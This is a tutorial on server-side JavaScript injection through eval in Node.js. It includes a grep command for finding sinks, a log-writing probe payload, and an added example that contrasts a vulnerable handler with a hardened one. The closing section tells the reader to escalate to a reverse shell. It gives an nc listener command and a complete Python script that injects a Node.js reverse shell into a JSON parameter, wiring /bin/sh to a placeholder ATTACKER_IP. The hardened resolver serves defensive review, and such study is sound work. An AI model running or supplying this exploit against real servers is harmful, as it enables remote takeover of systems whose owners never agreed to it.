JavaScript Injection

In the case of JavaScript, a search for the eval function should be at the top of the list of things to look for, because eval evaluates a string as code: if any part of that string is built from request data, the caller gets arbitrary code execution inside the Node.js process. The related sinks new Function(), vm.runInNewContext() and setTimeout()/setInterval() called with a string argument deserve the same scrutiny:

grep -rnE --color '\beval\s*\(' .

Then open each file the grep output points to and trace backwards from the eval call: find what the evaluated string is built from and whether any part of it comes from the request (body, query string, headers).

If we see that JSON POST requests trigger the processing function, we can try appending a JavaScript statement to one of the JSON parameters, for example a probe that only writes a marker to the server's log:

require('util').log('CODE_EXECUTION');

util.log writes a timestamped line to stderr, so this probe is blind: it confirms execution only if we can read the server's output. If we cannot, a probe with a side effect visible from outside (a delay, or an outbound connection to a host we control) is easier to confirm.
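To make the sink and the probe concrete, here is an added example that is not code from the original page or from any real application: a minimal model of a Node.js batch-request handler that resolves "$1.id"-style references in a JSON path parameter, first in the vulnerable form grep would point at and then in a hardened form that never calls eval. The handler shape, the "$N" reference syntax, the function names and the sample data are all assumptions chosen to mirror the payload shown above; the injected path sets a global marker instead of calling util.log so the effect can be checked in-process.

```javascript
// Added example, not code from the original page or from any real application:
// a minimal model of a Node.js batch-request handler that resolves "$1.id"-style
// references in a JSON "path" parameter. The handler shape, the "$N" reference
// syntax and the sample data are assumptions chosen to mirror the payload above.

// Vulnerable: everything after "$N" is concatenated into source text and eval()'d.
// "/item/$1.id;PAYLOAD" becomes eval("results[0].id;PAYLOAD"), so the ';' ends the
// intended expression and PAYLOAD runs with the privileges of the Node process.
function resolvePathVulnerable(path, results) {
  return path.replace(/\$(\d+)(.*)/, (_, n, rest) =>
    String(eval('results[' + (n - 1) + ']' + rest)));
}

// Hardened: accept only "$N.identifier", look the property up without eval, and
// reject references that do not resolve instead of guessing. Any trailing ';...'
// stays inert text in the path.
function resolvePathSafe(path, results) {
  return path.replace(/\$(\d+)\.([A-Za-z_]\w*)/g, (ref, n, prop) => {
    const prev = results[n - 1];
    if (prev === null || typeof prev !== 'object' ||
        !Object.prototype.hasOwnProperty.call(prev, prop)) {
      throw new Error('unresolvable reference ' + ref);
    }
    return String(prev[prop]);
  });
}

// Runs both resolvers against a benign path and an injected one. The injected
// path sets a global marker (stand-in for the util.log probe) so the effect is
// observable here; in a real probe you would look for the log line instead.
function demo() {
  const results = [{ id: 1, name: 'widget' }];   // constructed: response to request_1
  const benign = '/item/$1.id';
  const injected = '/item/$1.id;globalThis.marker = "CODE_EXECUTION"';
  const out = {};

  out.benignVulnerable = resolvePathVulnerable(benign, results);   // "/item/1"
  out.benignSafe = resolvePathSafe(benign, results);               // "/item/1"

  delete globalThis.marker;
  out.injectedVulnerable = resolvePathVulnerable(injected, results); // "/item/CODE_EXECUTION"
  out.markerAfterVulnerable = globalThis.marker;                     // "CODE_EXECUTION": payload ran

  delete globalThis.marker;
  out.injectedSafe = resolvePathSafe(injected, results); // "$1.id" resolved, the rest left as text
  out.markerAfterSafe = globalThis.marker;               // undefined: nothing was executed
  return out;
}

console.log(demo());
```

The hardened resolver is the shape of fix to look for when reviewing the real handler: a strict grammar for what a reference may contain, a lookup that walks data rather than source text, and a hard failure on anything that does not resolve.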

If the probe fires, swap it for a reverse shell. Start a listener on the attacker host first (for example nc -lvnp 4444, matching attackerport below), then send the payload:

import requests

target = 'http://TARGET/endpoint'   # endpoint whose handler feeds the JSON into eval()
attackerip = 'ATTACKER_IP'          # host running the listener (nc -lvnp 4444)
attackerport = 4444
cmd = '/bin/sh'                     # process to spawn and wire to the socket

request_1 = '{"method":"get","path":"/example1"}'
request_2 = '{"method":"get","path":"/example2"}'

# Node.js reverse shell: spawn cmd, pipe the socket into its stdin and its stdout/stderr back out
shell = 'var net = require(\'net\'),sh = require(\'child_process\').exec(\'%s\'); ' % cmd
shell += 'var client = new net.Socket(); '
shell += 'client.connect(%s, \'%s\', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);' % (attackerport, attackerip)
shell += 'sh.stderr.pipe(client);});'

# The ';' after $1.id terminates the expression the server evaluates, so the shell runs as a second statement
request_3 = '{"method":"get","path":"/item/$1.id;%s"}' % shell
body = '{"requests":[%s,%s,%s]}' % (request_1, request_2, request_3)

# Send the string as-is with a JSON content type; json= would re-serialize it and may alter the payload
r = requests.post(target, data=body, headers={'Content-Type': 'application/json'})
print(r.content)
